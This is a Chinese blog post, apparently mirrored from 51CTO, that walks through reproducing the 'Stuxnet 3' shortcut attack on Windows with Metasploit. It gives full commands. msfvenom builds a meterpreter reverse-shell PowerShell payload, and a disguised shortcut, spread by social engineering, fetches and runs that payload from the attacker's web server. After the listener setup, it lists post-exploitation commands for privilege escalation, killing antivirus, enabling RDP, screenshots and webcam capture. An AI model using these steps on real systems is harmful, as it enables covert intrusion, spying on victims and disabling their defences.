6

震网三代 漏洞复现_qq63bce37b7b928的技术博客_51CTO博客

 1 year ago
source link: https://blog.51cto.com/u_15936127/6007982
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

震网三代 漏洞复现

精选 原创

半江渔火 2023-01-15 00:37:08 博主文章分类:MSF ©著作权

文章标签 Windows sed Server 文章分类 安全技术 网络/安全 阅读数179

  1. 一台kali虚拟机
  2. 一下任意一台可复现该漏洞的电脑:
  1. 可复现的操作系统版本
  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

还有win10 企业版 2015长期服务方案

  1. 可复现的服务器系统版本
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

打开msf

msfconsole

在root下创建msf后门;

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=攻击机的ip lport= 攻击机的端口 -f psh-reflection>/var/www/html/link.ps1

注意: 如果想看文件, 就到这里:

cd /var/www/html
ls

kali下开启Apache2

service apache2 start

震网三代 漏洞复现_Windows

通过社工传播快捷方式的传播

在准备好的 win10上 , 创建快捷方式, 填入:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://攻击机的ip/link.ps1');link.ps1"
震网三代 漏洞复现_sed_02
震网三代 漏洞复现_Server_03

也可以自行重命名, 此处就叫左面了

震网三代 漏洞复现_Windows_04

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp
options

接着, 根据提示, 设置 lhost 和 lport ** , 也就是之前设置的要是用的攻击机的ip** 和 攻击机的端口

这里的端口需要和刚才生成的后门的端口一致.

直接输入:

run

# 也可以用
exploit

点击win11的快捷图标

震网三代 漏洞复现_Windows_05

这个代表成功啦!

后渗透测试阶段命令

# 如果对面显示过来的有乱码
shell
chcp 65001

# 进入桌面
cd users/mb/desktop

# 查看进程
ps

# 查看当前进程号
getpid

# 查看系统信息
sysinfo

# 查看目标机是否为虚拟机
run post/windows/gather/checkvm

# 查看完整网络设置
route

# 查看当前权限
getuid

# 自动提权
getsystem


# 关闭杀毒软件
run post/windows/manage/killav


# 启动远程桌面协议
run post/windows/manage/enable_rdp


# 列举当前登录的用户
run post/windows/gather/enum_logged_on_users


# 查看当前应用程序
run post/windows/gather/enum_applications


# 抓取目标机的屏幕截图
load espia ; screengrab


# 抓取摄像头的照片
webcam_snap


# 查看当前处于目标机的那个目录
pwd


# 查看当前目录
getlwd
  • 收藏
  • 评论
  • 分享
  • 举报

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK